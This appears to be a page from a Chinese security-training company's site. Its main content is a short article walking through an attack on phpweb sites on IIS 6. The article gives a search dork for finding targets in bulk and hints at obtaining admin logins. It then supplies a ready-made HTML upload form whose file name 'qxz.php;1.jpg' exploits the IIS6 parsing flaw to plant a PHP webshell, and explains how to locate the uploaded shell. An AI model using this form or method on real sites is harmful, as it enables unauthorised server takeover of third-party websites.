天创培训:您身边的信息安全培训专家!
栏目列表
开班计划
2020年3月CISP-PTE周末直播班
主讲老师   张老师、高老师等
开课时间   2020年3.21-4.15
培训方式   实地/面授
授课天次   8天
上课时间   周末直播
课程介绍 在线报名
2020年3月CISP周末直播班
主讲老师   张老师、王老师等
开课时间   3月14,15,21,22,28
培训方式   直播
授课天次   培训5天+考试半天
上课时间   09:00 -- 16:30
课程介绍 在线报名
技术中心您当前位置:首页 > 资源专区 > 技术中心

phpweb+iis6解析漏洞拿shell过程

作者:天创培训  来源:px.tcnet.com.cn  更新时间:2016-02-25  关键词:漏洞

为了达到想要的效率,我们可以批量的找phpweb的站点,

关键字:inurl:news/html/?411.html 也可以用一些web漏洞批量检测的,譬如黑吧安全网web漏洞扫描器,本人也在用的,虽然有点老

不过还是有些作用的。文章最后给出下载地址。对了,现在谷歌不能用了,再给出一个访问谷歌的地址 http://91.213.30.153/


后台网址后面直接加 admin.php 。 账号密码怎么拿就不多说了,都懂的。记住拿iis6.0的站点,进入后台不要关闭


复制以下代码保存为.HTML格式
代码:-
--------------------------------------------------------------------------------------------------------------
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"> 
<input type="text" name="fileName" value="qxz.php;1.jpg" /> 
<input type="hidden" name="attachPath" value="news/pics/" /> 
<input type="file" name="fileData" size="14" /></td> 
<input type="submit" name="button" value="确定" /> 
</form>
-------------------------------------------------------------------------------------
里面的www.xxx.com为你的网址


打开之后会是一个上传的页面,你就把一句话,或者是马上传,记住,后缀一定是这种 qxz.php;1.jpg 格式,然后查看网页源代码,就会有个路径


这就是马的路径,ok就这么简单。




推荐阅读

网站首页 |  关于天创 |  课程体系 |  最新动态 |  联系我们 |  网站地图 |  二维码
版权所有:江苏天创科技有限公司 苏ICP备16028135号-2
苏州总部地址:江苏省苏州市十梓街327号 电话:0512-65129087 传真:0512-65157410 邮编:215000
南京分公司地址:南京珠江路88号新世界中心A座 电话:025-84533276 传真:025-84533286 邮编:210000